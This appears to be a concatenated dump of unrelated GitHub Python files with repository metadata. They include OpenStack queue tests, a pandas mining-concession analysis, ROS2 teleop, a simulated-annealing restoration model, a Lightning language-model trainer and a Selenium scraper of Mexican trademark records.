self.queues)\n\n @test.attr(type='smoke')\n def test_get_queue_stats(self):\n # Retrieve random queue\n queue_name = self.queues[data_utils.rand_int_id(0,\n len(self.queues) - 1)]\n # Get Queue Stats for a newly created Queue\n _, body = self.get_queue_stats(queue_name)\n msgs = body['messages']\n for element in ('free', 'claimed', 'total'):\n self.assertEqual(0, msgs[element])\n for element in ('oldest', 'newest'):\n self.assertNotIn(element, msgs)\n\n @test.attr(type='smoke')\n def test_set_and_get_queue_metadata(self):\n # Retrieve random queue\n queue_name = self.queues[data_utils.rand_int_id(0,\n len(self.queues) - 1)]\n # Check the Queue has no metadata\n _, body = self.get_queue_metadata(queue_name)\n self.assertThat(body, matchers.HasLength(0))\n # Create metadata\n key3 = [0, 1, 2, 3, 4]\n key2 = data_utils.rand_name('value')\n req_body1 = dict()\n req_body1[data_utils.rand_name('key3')] = key3\n req_body1[data_utils.rand_name('key2')] = key2\n req_body = dict()\n req_body[data_utils.rand_name('key1')] = req_body1\n # Set Queue Metadata\n _, body = self.set_queue_metadata(queue_name, req_body)\n self.assertEqual('', body)\n # Get Queue Metadata\n _, body = self.get_queue_metadata(queue_name)\n self.assertThat(body, matchers.Equals(req_body))\n\n @classmethod\n def resource_cleanup(cls):\n for queue_name in cls.queues:\n cls.client.delete_queue(queue_name)\n super(TestManageQueue, cls).resource_cleanup()\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/tempest/tempest/api/messaging/test_queues.py","file_name":"test_queues.py","file_ext":"py","file_size_in_byte":3680,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"39701049323","text":"## let's look at some of pandas cleanup methods\n\nimport os\nimport csv\nimport numpy as np\nimport pandas as pd\n\n## did we ever make a json file out of our bp_conc \n## spreadsheet? dunno. \n\n## just read in from spreadsheet:\n\nBPC = pd.read_csv('../mining_data/BP_Conc_Intersect_g.csv')\nBP = pd.read_csv('../mining_data/BP_g.csv')\nC = pd.read_csv('../mining_data/Concessions_g.csv')\n\n\n## what are the goals? \n## a spreadsheet with concessions by territory, sorted by size\n## a spreadshhet of BPs affected by concessions, sorted by area affected\n\n## lotsa other stuff. But gotta be real in the goals\n\n## so for today? get the locations split out on both pandas, export as csvs\n## put them and the map of loscedros on the website\n\n## so back to the basics - how do we split this column into two?\n\nPROV = BPC['ubicacion'].apply(lambda x : x.split(';'))\n\n## or \n\nPROV = BPC['ubicacion'].str.split(';')\n\nPROV[0][0]\n\n## but to get at the elements of this list?\n\nPROV1 = [ a[0].split(':')[1].strip() for a in PROV ]\nPROV2 = [ a[1].split(':')[1].strip() for a in PROV ]\n\n## as long as the indices line up, we can do this:\nBPC['Prov'] = PROV1\nBPC['Cant'] = PROV2\n\n## repeat all that for the BP df:\n\n## not working#########\nPROV = BP['ubicacion'].str.split(';')\nPROV1 = [ a[0].split(':')[1].strip() for a in PROV ]\nPROV2 = [ a[1].split(':')[1].strip() for a in PROV ]\nBP['Prov'] = PROV1\nBP['Cant'] = PROV2\n## not working#########\n\n## aside, roo wants LC's number:\n\nBP = BP.set_index('nombre')\nBP.loc['LOS CEDROS']\nBP = BP.reset_index()\n\n## okay, how do we group the BP/concession chart by BP?\n\n## can we get a list of all affected BPs?\nnoms = BPC.nombre.unique()\n\n## have a feeling this would be a lot easier with a database\n## oh well, just spit this out. Set up dbs later\n\n##noms is our first column. we also want the BP code...\nBPcode = [ BP[BP.nombre == i ].cod_bosq_m.iloc[0] for i in noms ]\n\n########### area of each BP:#########\n\nBParea_Ha = [ BP[BP.nombre == i ].area_ha.iloc[0] for i in noms ]\n\n########### now how do we get the identity of concessions in each?#########\n\n## function to collect names of concessions:\ndef getconcIDs(nom):\n BPs = BPC.groupby('nombre')\n bb = BPs.get_group(nom)\n conc_ids = list(bb.nam)\n return(conc_ids)\n\n## so for each BP:\nconcIDs = [ getconcIDs(i) for i in noms ]\n\n## how can we convert our concession ids to strings,\n## join into a single cell of a spreadsheet?\n\n## a function to get rid of empty decimal of a concID if necessary:\ndef cleanzero(i): ## uses a float\n i = str(i)\n if float(i) % 1 == 0: ## if there is a decimal\n dec = i.find('.') ## find decimal\n zoop = i[:dec] ## remove\n else: zoop = str(i)\n return(zoop)\n\n## nest into another function, that can handle a list, and joins?\ndef cleanallzeros(lst): \n if type(lst) is list: ## if it's a list of numbers\n clz = [ cleanzero(str(j)) for j in lst ]\n clzs = \", \".join(clz)\n elif type(lst) is float: ## if its a scalar \n clzs = cleanzero(str(lst))\n return(clzs)\n\n## apply this to all of the lists in concIDs\nconcIDs = pd.Series(concIDs).apply(cleanallzeros)\n\n########### and for the combined areas of concessions?#########\n\n\ndef getconcArea(nom):\n BPs = BPC.groupby('nombre')\n bb = BPs.get_group(nom)\n concArea_Hai = sum(bb.area)/10000 ## convert to Ha\n return(concArea_Hai)\n\n## so for each BP:\nconcArea_Ha = [ getconcArea(i) for i in noms ]\n\n########### now calculate % underconcession:#########\n\nperConc = np.array(concArea_Ha) / np.array(BParea_Ha)\n\n####### province information for each BP #########\n\n## locations, province and canton\nBPub = [ list(BP[BP.nombre == i ].ubicacion)[0] for i in noms ]\n\nlen(BPub)\n\n## split it up:\n\nublist = pd.Series(BPub).str.split(';')\n\n## take out just the first elemnent of resulting lists\nBPprov = [ a[0].split(':')[1].strip() for a in ublist ]\n\n\n## did this work?\ndf = pd.concat([pd.Series(noms), \\\n pd.Series(BPcode), \\\n pd.Series(BPprov), \\\n pd.Series(concIDs), \\\n pd.Series(concArea_Ha), \\\n pd.Series(BParea_Ha), \\\n pd.Series(perConc), \\\n ], keys = [ \\\n 'noms', \\\n 'BPcode', \\\n 'BPprov', \\\n 'concIDs', \\\n 'concArea_Ha', \\\n 'BParea_Ha', \\\n 'perConc', \\\n ], axis = 1)\n\n## sanity checks\n## seems ok\n\ndf.to_csv('BP_percent_concessioned.csv')\n\n\n","repo_name":"danchurch/BPwebsite","sub_path":"scripts/BP_Concession_overlap/makeBPConcSpreadsheet.py","file_name":"makeBPConcSpreadsheet.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"69804917891","text":"#tab escaped charcter\ntabby_cat = \"\\tI'm tabbed in.\"\n#line break escaped charcter\npersian_cat = \"I'm split\\nona line.\"\n#escaped slash\nbackslash_cat = \"I'm \\\\ a \\\\ \\a cat.\"\n\n#making a bulleted list with tripple quotes\nfat_cat = '''\nI'll do a list:\n\\t* Cat food\n\\t* Fishies\n\\t* Catnip\\n\\t* Grass\n'''\n\nprint(tabby_cat)\nprint(persian_cat)\nprint(backslash_cat)\nprint(fat_cat)","repo_name":"tedstetzel/learn-python-the-hard-way","sub_path":"ex10.py","file_name":"ex10.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74843513409","text":"# vim: ai:sw=4:ts=4:sta:et:fo=croql\n# pylint: disable=missing-module-docstring,missing-class-docstring,too-few-public-methods\n# type: ignore\nfrom typing import Any, Dict, Generator, Optional\n\nimport pytest\n\nfrom tests import common\nfrom yaas_common import const\nfrom yaas_config import config, resolve_config\nfrom yaas_gcp import gcs\n\n\ndef _config(topic_to_pubsub_gcs: Optional[str] = None) -> config.Config:\n return common.TEST_CONFIG_LOCAL_JSON.clone(topic_to_pubsub_gcs=topic_to_pubsub_gcs)\n\n\nclass _MyBlob:\n def __init__(self, name: str, content: Optional[bytes] = None):\n self.name = name\n self._content = content\n self.called = {}\n\n def download_as_bytes(self) -> bytes:\n self.called[_MyBlob.download_as_bytes.__name__] = True\n return self._content\n\n\n@pytest.mark.parametrize(\n \"value,extra_topics\",\n [\n (_config(None), {}),\n (\n _config(\"gs://test-bucket/path/to/prefix\"),\n {\n \"extra-topic-1\": \"projects/test-project/topics/test-topic-1\",\n \"extra-topic-2\": \"projects/test-project/topics/test-topic-2\",\n },\n ),\n ],\n)\ndef test_consolidate_config_ok(monkeypatch, value: config.Config, extra_topics: Dict[str, str]):\n # Given\n called = _mock_list_objects(monkeypatch, extra_topics)\n # When\n result = resolve_config.consolidate_config(value)\n # Then\n _verify_unchanged(result, value)\n # Then: extra topics\n if extra_topics:\n _verify_list_called(called.get(resolve_config.gcs.list_objects.__name__), result)\n for topic, topic_id in extra_topics.items():\n assert result.topic_to_pubsub.get(topic) == topic_id\n else:\n assert not called\n\n\ndef _mock_list_objects(monkeypatch, extra_topics: Dict[str, str]) -> Optional[Dict[str, Any]]:\n called = {}\n\n def mocked_list_objects( # pylint: disable=unused-argument\n *,\n bucket_name: str,\n prefix: str,\n project: Optional[str] = None,\n ) -> Generator[_MyBlob, None, None]:\n nonlocal called, extra_topics\n called[resolve_config.gcs.list_objects.__name__] = locals()\n for topic, topic_id in extra_topics.items():\n yield _MyBlob(\n name=topic,\n content=bytes(topic_id.encode(const.ENCODING_UTF8) if isinstance(topic_id, str) else topic_id),\n )\n\n monkeypatch.setattr(\n resolve_config.gcs,\n resolve_config.gcs.list_objects.__name__,\n mocked_list_objects,\n )\n return called\n\n\ndef _verify_list_called(called, result):\n bucket_name, prefix = gcs.get_bucket_and_prefix_from_uri(result.topic_to_pubsub_gcs)\n assert isinstance(called, dict)\n assert called.get(\"bucket_name\") == bucket_name\n assert called.get(\"prefix\") == prefix\n\n\ndef _verify_unchanged(result, value):\n assert isinstance(result, config.Config)\n assert result.calendar_config == value.calendar_config\n assert result.cache_config == value.cache_config\n assert result.topic_to_pubsub_gcs == value.topic_to_pubsub_gcs\n assert result.retention_config == value.retention_config\n # Then: topic_to_pubsub\n for topic, topic_id in value.topic_to_pubsub.items():\n assert result.topic_to_pubsub.get(topic) == topic_id\n\n\ndef test_consolidate_config_nok(monkeypatch):\n # Given\n value = _config(\"gs://test-bucket/path/to/prefix\")\n extra_topics = {\n \"extra-topic-1\": \"projects/test-project/topics\",\n \"extra-topic-2\": bytes(123),\n }\n for topic, topic_id in value.topic_to_pubsub.items():\n extra_topics[topic] = f\"{topic_id}-not\"\n called = _mock_list_objects(monkeypatch, extra_topics)\n # When\n result = resolve_config.consolidate_config(value)\n # Then\n _verify_unchanged(result, value)\n _verify_list_called(called.get(resolve_config.gcs.list_objects.__name__), result)\n # Then: topic_to_pubsub\n for topic, topic_id in extra_topics.items():\n if topic in value.topic_to_pubsub:\n assert result.topic_to_pubsub.get(topic) != topic_id\n else:\n assert topic not in result.topic_to_pubsub\n","repo_name":"fgka/py-yaas","sub_path":"code/core/tests/yaas_config/test_resolve_config.py","file_name":"test_resolve_config.py","file_ext":"py","file_size_in_byte":4131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"16506069682","text":"# Imports\nfrom datetime import datetime # For finding system's real time\nimport math\nimport os\nimport socket # For collecting the system hostname to be added to the conf file.\nimport sys # For reading command-line arguments and exiting program with exit code\nimport yaml # For loading config file\n\n\ndef format_output(data_str, addresses, connected_devices):\n # Convert data string into list and trim off the last 7 irrelevant data points\n csv_data = data_str.split(\",\")[:-7]\n\n # Scan through the data to see if there's a match with known SDI-12 devices\n for address in addresses:\n for index in range(len(csv_data)):\n if address == csv_data[index]:\n # If a known SDI-12 address matches with an address in the data,\n # overwrite the address with a common sensor name\n csv_data[index] = connected_devices[csv_data[index]]\n\n temp_kelvin = voltage_to_kelvin(float(csv_data[-1]))\n csv_data.append(\"%0.2f\" % temp_kelvin)\n\n # Return newly formatted data as a string\n return \",\".join(csv_data)\n\n\ndef generate_filename():\n date = datetime.now().strftime(\"%Y%m%d\")\n\n filename = f\"sdi-12-{date}.csv\"\n return filename\n\n\ndef load_config():\n try:\n with open('/config.yaml', 'r') as file:\n config = yaml.safe_load(file)\n\n return config\n\n except FileNotFoundError:\n print(\"[-] No config file found; please refer to the GitHub repo for a working example.\")\n sys.exit(1)\n\n\ndef setup_csv(filepath, header):\n file_exists = os.path.exists(filepath)\n\n if(file_exists):\n # Open existing file\n file = open(filepath, 'a')\n\n else:\n # Open the new file and write header\n file = open(filepath, 'w')\n file.write(header + '\\n')\n\n return file\n\n\ndef voltage_to_kelvin(volts):\n resistance = 100000 * (volts / (5-volts))\n R0 = 100000\n # B value from KOKISO 100k thermistor sales page\n B = 3950\n\n temp_kelvin = 1 / ( (1 / 298) + (1 / B) * ( math.log(resistance / R0) ) )\n\n return temp_kelvin\n","repo_name":"DiscoverCCRI/sdi-12-data-collector","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36986640137","text":"import rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\nfrom my_py_pkg.get_char import GetChar\n\nmsg_how2 = '''\n---------------------------------------\n (forward)\n 'w'\n\n (ccw)'a' 's' 'd'(cw)\n (backward)\n---------------------------------------\ntype 'Ctrl-C' or 'Q' to quit program...\n---------------------------------------\n'''\n\nclass RemoteTurtle(Node):\n\n def __init__(self):\n super().__init__('remote_turtle')\n qos_profile = QoSProfile(depth=10)\n self.tw_pub = self.create_publisher(Twist, '/turtle1/cmd_vel', qos_profile)\n \n def publish_tw_msg(self, tw_msg):\n msg2 = Twist()\n #msg = tw_msg\n msg2 = Joy()\n\n self.tw_pub.publish(msg2)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n node = RemoteTurtle()\n kb_input = GetChar()\n tw = Twist()\n ch = ' '\n count_keyin = 0\n count_reset = 15\n\n try:\n print(msg_how2)\n\n while ch != 'Q':\n\n ch = kb_input.getch()\n\n if ch == 'w':\n tw.linear.x = 2.0; tw.angular.z = .0\n print(\": forward\" ); count_keyin = count_keyin + 1\n elif ch == 's':\n tw.linear.x = -2.0; tw.angular.z = .0\n print(\": backward\" ); count_keyin = count_keyin + 1\n elif ch == 'a':\n tw.linear.x = .0; tw.angular.z = 2.0\n print(\": turn left\" ); count_keyin = count_keyin + 1\n elif ch == 'd':\n tw.linear.x = .0; tw.angular.z = -2.0\n print(\": turn right\"); count_keyin = count_keyin + 1\n elif ch == 'Q' or ch == 'q':\n break\n else:\n pass\n\n node.publish_tw_msg(tw)\n\n count_keyin = count_keyin % count_reset\n if count_keyin == 0:\n print(msg_how2)\n\n except KeyboardInterrupt:\n node.get_logger().info('Keyboard Interrupt(SIGINT)')\n\n finally:\n node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"leeeju/ROS2_turtlebot3_project","sub_path":"my_py_pkg/my_py_pkg/script/remote_turtle.py","file_name":"remote_turtle.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"24715156161","text":"from simanneal import Annealer\nfrom restorationmodel import RestorationModel\nfrom ToolBox import *\nfrom joblib import Parallel, delayed\n\n\nimport numpy as np\nimport random\n\n\nclass SimAnnealInterface(Annealer):\n \"\"\"\n Interface to use simaneal package and its classes\n ...\n Attributes/Parameters\n ----------\n test : bool\n a variable to define if the model runs on test data or original data\n capacity_losses : dict\n this includes ???\n\n Methods/Functions\n -------\n\n \"\"\"\n\n def __init__(self, state, graph, od_graph, od_matrix, graph_damaged, damage, fdir):\n self.graph = graph\n self.od_graph = od_graph\n self.od_matrix = od_matrix\n self.graph_damaged = graph_damaged\n self.no_damage = damage[0]\n self.initial_damage = damage[1]\n self.fdir = fdir\n\n # Model parameters for indirect costs\n self.mu = np.array([0.94, 0.06])\n self.xi = np.array([23.02, 130.96])\n self.F_w = np.array([6.7, 33])/100\n self.nu = 1.88\n self.rho = np.array([14.39, 32.54])/100\n self.upsilon = 83.27 * 8\n self.day_factor = 9\n\n with open(self.fdir+'energy.txt', 'w') as f:\n f.write('Energy')\n\n self.restoration_types = [0, 1, 2]\n super(SimAnnealInterface, self).__init__(state, fdir=self.fdir) # important!\n\n def move(self):\n \"\"\"Swaps two object in the restoration schedual.\"\"\"\n a = random.randint(0, len(self.state) - 1)\n b = random.randint(0, len(self.state) - 1)\n self.state[a], self.state[b] = self.state[b], self.state[a]\n\n # change type of restoration for one state\n c = random.choice(self.restoration_types)\n self.state[a] = (self.state[a][0], c)\n\n def energy(self):\n \"\"\"Calculates the costs of the restoration.\"\"\"\n e = 0\n\n restoration = RestorationModel(self.graph_damaged)\n restoration.run(self.state)\n restoration_graphs = restoration.get_restoration_graphs()\n restoration_times = restoration.get_restoration_times()\n restoration_costs = restoration.get_restoration_costs()\n\n damaged = []\n damaged.append(get_delta(self.no_damage, self.initial_damage))\n\n sim_results = Parallel(n_jobs=4)(delayed(parallel_model)(\n graph, self.od_graph, self.od_matrix) for graph in restoration_graphs[:-1])\n for values in sim_results:\n damaged.append(get_delta(self.no_damage, values))\n\n for idx, values in enumerate(damaged):\n dt = restoration_times[idx] if idx == 0 else restoration_times[idx] - \\\n restoration_times[idx-1]\n e += sum(restoration_costs[idx]) + dt * (self.day_factor * values[2] * np.sum(self.mu*self.xi) +\n values[3] * np.sum(self.mu * (self.nu * self.F_w + self.rho)) + values[4] * self.upsilon)\n with open(self.fdir+'energy.csv', 'a') as f:\n f.write('\\n'+str(e))\n\n return e\n","repo_name":"Savizmoghtader/RestoProgram","sub_path":"SimAnneal_Interface.py","file_name":"SimAnneal_Interface.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15140015051","text":"import argparse\n\nimport torch\nfrom lightning.pytorch import Trainer\nfrom lightning.pytorch.callbacks import EarlyStopping\nfrom lightning.pytorch.loggers import TensorBoardLogger\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom models import GRU, LSTM, RNN, Bigram, Transformer\n\nlogger = TensorBoardLogger(\"logs\", name=\"language_models\")\n\nmodels = {\n \"bigram\": Bigram,\n \"rnn\": RNN,\n \"lstm\": LSTM,\n \"gru\": GRU,\n \"transformer\": Transformer,\n}\n\n\ndef create_tokenizer(corpus):\n tokens = set(corpus)\n token_to_idx = {token: idx for idx, token in enumerate(tokens)}\n idx_to_token = {idx: token for idx, token in enumerate(tokens)}\n return token_to_idx, idx_to_token\n\n\ndef encode_corpus(corpus, token_to_idx):\n return torch.tensor(\n [token_to_idx[token] for token in corpus], dtype=torch.long\n )\n\n\ndef split_data(data, val_size):\n split_idx = int(len(data) * (1 - val_size))\n return data[:split_idx], data[split_idx:]\n\n\nclass CorpusDataset(Dataset):\n def __init__(self, data, context=8):\n self.data = data\n self.context = context\n\n def __len__(self):\n return len(self.data) - self.context\n\n def __getitem__(self, idx):\n return (\n self.data[idx : idx + self.context],\n self.data[idx + 1 : idx + self.context + 1],\n )\n\n\nif __name__ == \"__main__\":\n # Parse command line arguments\n args = argparse.ArgumentParser()\n args.add_argument(\"--model\", type=str, default=\"rnn\")\n args.add_argument(\"--context\", type=int, default=16)\n args.add_argument(\"--batch_size\", type=int, default=512)\n args.add_argument(\"--max_epochs\", type=int, default=5)\n args.add_argument(\"--learning_rate\", type=float, default=1e-3)\n args.add_argument(\"--val_size\", type=float, default=0.1)\n args.add_argument(\"--corpus\", type=str, default=\"data/shakespeare.txt\")\n args = args.parse_args()\n\n # Read corpus from file\n with open(args.corpus) as file:\n corpus = file.read()\n\n # Create vocabulary index mapping\n token_to_idx, idx_to_token = create_tokenizer(corpus)\n vocab_size = len(token_to_idx)\n\n # Encode corpus\n data = encode_corpus(corpus, token_to_idx)\n\n # Split data into train and validation set\n train_data, val_data = split_data(data, args.val_size)\n train_loader = DataLoader(\n dataset=CorpusDataset(train_data, args.context),\n batch_size=args.batch_size,\n )\n val_loader = DataLoader(\n dataset=CorpusDataset(val_data, args.context),\n batch_size=args.batch_size,\n shuffle=False,\n )\n\n # Train model\n model = models[args.model](\n vocab_size=vocab_size,\n context=args.context,\n learning_rate=args.learning_rate,\n tokenizer=(token_to_idx, idx_to_token),\n )\n trainer = Trainer(\n max_epochs=args.max_epochs,\n callbacks=[EarlyStopping(\"val_loss\")],\n logger=logger,\n )\n trainer.fit(\n model=model,\n train_dataloaders=train_loader,\n val_dataloaders=val_loader,\n )\n\n # Save model checkpoint\n trainer.save_checkpoint(f\"checkpoints/{args.model}.ckpt\")\n","repo_name":"mwinterde/lightning-language-models","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"27341300818","text":"## The representation uses the largest possible symbols from left to right.\n## Greedy\n\n## Time Complexity: O(1) since there is a finite set of values and the corresponding\n## roman numerals to iterate through.\n## Space Complexity: O(1) - the amount of memory used does not change with the size\n## of the input integer\nclass Solution:\n def intToRoman(self, num):\n '''\n :type num: int\n :rtype: str\n '''\n # Sequences must be in order from largest to smallest\n values = [1000, 900, 500, 400, 100, 90, 50, 40, 10, 9, 5, 4, 1]\n symbols = ['M', 'CM', 'D', 'CD', 'C', 'XC', 'L', 'XL', 'X', 'IX', 'V', 'IV', 'I']\n\n res = ''\n for val, sym in zip(values, symbols):\n res += (num // val) * sym\n num %= val\n return res\n","repo_name":"Shirleyxxy/lc-python-algorithms","sub_path":"medium/integer-to-roman.py","file_name":"integer-to-roman.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"72708124929","text":"# Importamos la función random\nimport random\n# Iniciamos la variable de el numero al azar del 1 al 100\nnum = random.randint(1, 100)\n# Iniciamos el contador a 5\ncontador = 5\n\nprint(\"ADIVINA EL NUMERO DEL 1 AL 100\")\n# Pedimos el numero al usuario\nnumuser = int(input(\"Introduce un numero del 1 al 100: \"))\n# Comparamos;\n# Mientras el input es distinto y el contador no sea 0\n# Mostramos cuantos intentos quedan y que vuelva a intentar\nwhile numuser != num and contador != 1:\n contador = contador - 1\n print(\"Te quedan \", contador, \" Intentos\")\n numuser = int(input(\"Introduce un numero del 1 al 100: \"))\n# Comparador al salir del bucle\n# Si se ha quedado sin intentos\nif contador == 0:\n print(\"No has acertado\")\n# si ha acertado\nelif numuser == num:\n print(\"Has acertado, el numero era: \", num)\n# Cualquier otra cosa\nelse:\n print(\"No has acertado :(\")\n","repo_name":"aleexnl/aws-python","sub_path":"UF1/Nieto_Alejandro_Gomez_Alejandro_PT9/Ej2.py","file_name":"Ej2.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24893616141","text":"from mongoengine import NotUniqueError\nfrom pymongo.errors import DuplicateKeyError\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\n\nfrom app.db.db_engine import create_connection, create_index\nfrom app.models.cliente import Expediente, Cliente, Apoderado\nfrom app.selenium_impi.data import ids\n\n\ndef buscar_expediente(driver: Chrome, expediente: str):\n url = 'https://acervomarcas.impi.gob.mx:8181/marcanet/vistas/common/datos/bsqExpedienteCompleto.pgi'\n driver.get(url)\n WebDriverWait(driver, 30).until(\n ec.visibility_of_element_located((By.ID, '''frmBsqExp:expedienteId'''))).send_keys(expediente)\n WebDriverWait(driver, 30).until(ec.element_to_be_clickable((By.ID, '''frmBsqExp:busquedaId2'''))).click()\n\n\ndef get_by_id(driver: Chrome, _id) -> str:\n WebDriverWait(driver, 1).until(\n ec.visibility_of_element_located((By.ID, _id)))\n\n text = driver.find_element_by_id(_id).text\n return text\n\n\ndef extraer_informacion_expediente(driver):\n expediente = None\n cliente = None\n apoderado = None\n datos_generales_numero_expediente = None\n datos_generales_fecha_presentacion = None\n datos_generales_fecha_publicacion_solicitud = None\n datos_generales_denominacion = None\n datos_generales_tipo_solicitud = None\n datos_titular_nombre = None\n datos_titular_direccion = None\n datos_titular_poblacion = None\n datos_titular_codigo_postal = None\n datos_titular_pais = None\n datos_titular_nacionalidad = None\n datos_titular_telefono = None\n datos_titular_email = None\n datos_apoderado_nombre = None\n datos_apoderado_direccion = None\n datos_apoderado_poblacion = None\n datos_apoderado_codigo_postal = None\n datos_apoderado_pais = None\n try:\n\n try:\n datos_generales_numero_expediente = get_by_id(driver, ids['datos_generales']['numero_expediente'])\n\n except:\n datos_generales_numero_expediente = None\n\n try:\n datos_generales_fecha_presentacion = get_by_id(driver, ids['datos_generales']['fecha_presentacion'])\n\n except:\n datos_generales_fecha_presentacion = None\n\n try:\n datos_generales_fecha_publicacion_solicitud = get_by_id(driver,\n ids['datos_generales'][\n 'fecha_publicacion_solicitud'])\n except:\n datos_generales_fecha_publicacion_solicitud = None\n\n try:\n datos_generales_denominacion = get_by_id(driver, ids['datos_generales']['denominación'])\n\n except:\n datos_generales_denominacion = None\n\n try:\n datos_generales_tipo_solicitud = get_by_id(driver, ids['datos_generales']['tipo_solicitud'])\n\n except:\n datos_generales_tipo_solicitud = None\n\n try:\n datos_titular_nombre = get_by_id(driver, ids['datos_titular']['nombre'])\n\n except:\n datos_titular_nombre = None\n\n try:\n datos_titular_direccion = get_by_id(driver, ids['datos_titular']['direccion'])\n\n except:\n datos_titular_direccion = None\n\n try:\n datos_titular_poblacion = get_by_id(driver, ids['datos_titular']['poblacion'])\n\n except:\n datos_titular_poblacion = None\n\n try:\n datos_titular_codigo_postal = get_by_id(driver, ids['datos_titular']['codigo_postal'])\n\n except:\n datos_titular_codigo_postal = None\n\n try:\n datos_titular_pais = get_by_id(driver, ids['datos_titular']['pais'])\n\n except:\n datos_titular_pais = None\n\n try:\n datos_titular_nacionalidad = get_by_id(driver, ids['datos_titular']['nacionalidad'])\n\n except:\n datos_titular_nacionalidad = None\n\n try:\n datos_titular_telefono = get_by_id(driver, ids['datos_titular']['telefono'])\n\n except:\n datos_titular_telefono = None\n\n try:\n datos_titular_email = get_by_id(driver, ids['datos_titular']['email'])\n\n except:\n datos_titular_email = None\n\n try:\n datos_apoderado_nombre = get_by_id(driver, ids['datos_apoderado']['nombre'])\n\n except:\n datos_apoderado_nombre = None\n\n try:\n datos_apoderado_direccion = get_by_id(driver, ids['datos_apoderado']['direccion'])\n\n except:\n datos_apoderado_direccion = None\n\n try:\n datos_apoderado_poblacion = get_by_id(driver, ids['datos_apoderado']['poblacion'])\n\n except:\n datos_apoderado_poblacion = None\n\n try:\n datos_apoderado_codigo_postal = get_by_id(driver, ids['datos_apoderado']['codigo_postal'])\n\n except:\n datos_apoderado_codigo_postal = None\n\n try:\n datos_apoderado_pais = get_by_id(driver, ids['datos_apoderado']['pais'])\n\n except:\n datos_apoderado_pais = None\n\n apoderado = Apoderado(\n nombre=datos_apoderado_nombre,\n direccion=datos_apoderado_direccion,\n poblacion=datos_apoderado_poblacion,\n codigo_postal=datos_apoderado_codigo_postal,\n pais=datos_apoderado_pais,\n )\n\n expediente = Expediente(\n denominacion=datos_generales_denominacion,\n numero_expediente=datos_generales_numero_expediente,\n fecha_presentacion=datos_generales_fecha_presentacion,\n fecha_publicacion=datos_generales_fecha_publicacion_solicitud,\n tipo_solicitud=datos_generales_tipo_solicitud,\n apoderado=apoderado,\n )\n\n cliente = Cliente(\n nombre=datos_titular_nombre,\n direccion=datos_titular_direccion,\n poblacion=datos_titular_poblacion,\n pais=datos_titular_pais,\n codigo_postal=datos_titular_codigo_postal,\n nacionalidad=datos_titular_nacionalidad,\n telefono=datos_titular_telefono,\n email=datos_titular_email,\n expedientes=[expediente]\n )\n cliente.save()\n\n except (DuplicateKeyError, NotUniqueError):\n cliente = Cliente.objects(nombre=datos_titular_nombre).get()\n cliente.expedientes.append(expediente)\n cliente.save()\n\n\ndef extract_expediente(driver: Chrome, lista_expedientes):\n create_connection()\n create_index()\n for expediente in lista_expedientes:\n try:\n buscar_expediente(driver, expediente)\n extraer_informacion_expediente(driver)\n\n except Exception as error:\n print(error)\n continue\n","repo_name":"usuarioMan/impi","sub_path":"app/selenium_impi/extraction_expedientes.py","file_name":"extraction_expedientes.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24455218772","text":"# -*- coding: utf-8 -*-\nimport importlib\nimport os\nimport sys\nfrom os.path import dirname, abspath, join\n\nimport urllib\n\nfrom celery import Celery\n\n\nsys.path.append(os.getcwd())\nPROJECT_DIR = dirname(dirname(abspath(__file__)))\nsys.path.insert(0, PROJECT_DIR)\n\n# from gptengine.extensions import swagger\nfrom gptengine.extensions import db, migrate, ma, redis_store\nfrom gptengine.settings import swagger_config, FLASK_PORT,DEBUG\nfrom gptengine.common.models import testmodel\nfrom gptengine.core.common_util import get_resource_path\nfrom logging.config import fileConfig\n\n# from flask_swagger_ui import get_swaggerui_blueprint\n# from jobs.extensions import apidoc\n# from gptengine.extensions import scheduler\nfrom flask import Flask, render_template\nimport logging\n# sys.path.append('/Users/charles/workspace/yr_prj/basin/tm/tm-gptengine/demo')\nlogger = logging.getLogger()\n\nCELERY_BROKER_URL = 'redis://localhost:6379/1'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/1'\nCELERYD_CONCURRENCY = 20\ncelery = Celery(__name__.split('.')[0], broker=CELERY_BROKER_URL)\n\ndef create_app(config_object='gptengine.settings'):\n \"\"\"An application factory, as explained here: http://flask.pocoo.org/docs/patterns/appfactories/.\n\n :param config_object: The configuration object to use.\n \"\"\"\n app = Flask(__name__.split('.')[0],\n template_folder=join(PROJECT_DIR, 'gptengine'),\n static_folder=join(PROJECT_DIR, 'gptengine', 'static'))\n 